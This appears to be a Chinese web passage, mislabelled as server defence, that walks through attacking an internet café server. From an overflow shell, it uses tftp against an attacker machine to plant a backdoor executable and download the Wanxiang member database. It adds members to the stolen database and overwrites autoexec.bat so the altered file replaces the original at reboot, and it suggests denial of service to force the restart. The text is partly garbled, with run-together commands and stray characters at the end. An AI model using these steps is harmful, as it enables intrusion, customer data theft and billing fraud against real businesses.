如何攻击网吧服务器服务器怎么防止攻击

三、入侵成功回到溢出shell，把djxyxs.exe传到服务器，执行“tftp-i192.168.0.50getdjxyxs.exeC:windowssystemdjxyxs.exe（注：192.168.0.50为本地机），传过来了，再执行“djxyxs”程序，对方的端口就要开了（还要重启），后门制作好了以后，来窃取服务器的会员数据库(这是本文的重点)，服务端一般是被装在C盘的us目录下，执行“tftp-i192.168.0.50putOct.mdbc:usOct.mdb”（注：oct.mdb为万象的会员数据库），一盏茶的功夫（视数据库的大小而定），数据库下载过来了，但是怎么打开呢？可以用Excel，但网吧里不会装这种玩意，记得服务器的共享目录Backup里有个万象的安装程序（在“百度”搜索“万象”可以找到），把它的服务端装到本机D盘根目录，用刚刚下载到C盘的Oct.mdb覆盖掉本机“D:us”目录里的空数据库文件，再运行服务端程序“server.exe”可以看到本网吧的所有会员，接下来是自己添加会员，没什么好说的，可别告诉我你不会。再着是要把修改后的数据库文件传回来，由于服务器的万象服务端是开着的，为避免发生冲突，切不可把修改过的数据库文件直接传到目标的us目录，要换一种方法，让服务器在重新启动过程中替换掉那两个文件，方法如下：

@echooff（关闭屏幕回显）movec:Oct.mdbc:us（将本机C盘的数据库文件替换掉服务器里的数据库文件）

3、回到服务器的shell，执行“tftp-i192.168.0.50getautoexec.batc:autoexec.bat”（用我们的自启动文件autoexec.bat覆盖掉服务器的autoexec.bat）。

4、最后是把修改过的数据库文件传到服务器，执行“tftp-i192.168.0.50getOct.mdbc:Oct.mdb”接下来只需叫管理员把服务器重启一下就可以了（呵呵！管理员会听你的吗？）。XP自带一个重启的命令（Shutdown），我在溢出的shell里执行“shutdown-r”后，提示“权限不够，客户机不能执行重d"启命令”，算了吧！心急的可以来个拒绝服务攻击。本篇写的确实挺乱的，没有什么技术性可言，仅供H9"x9bnB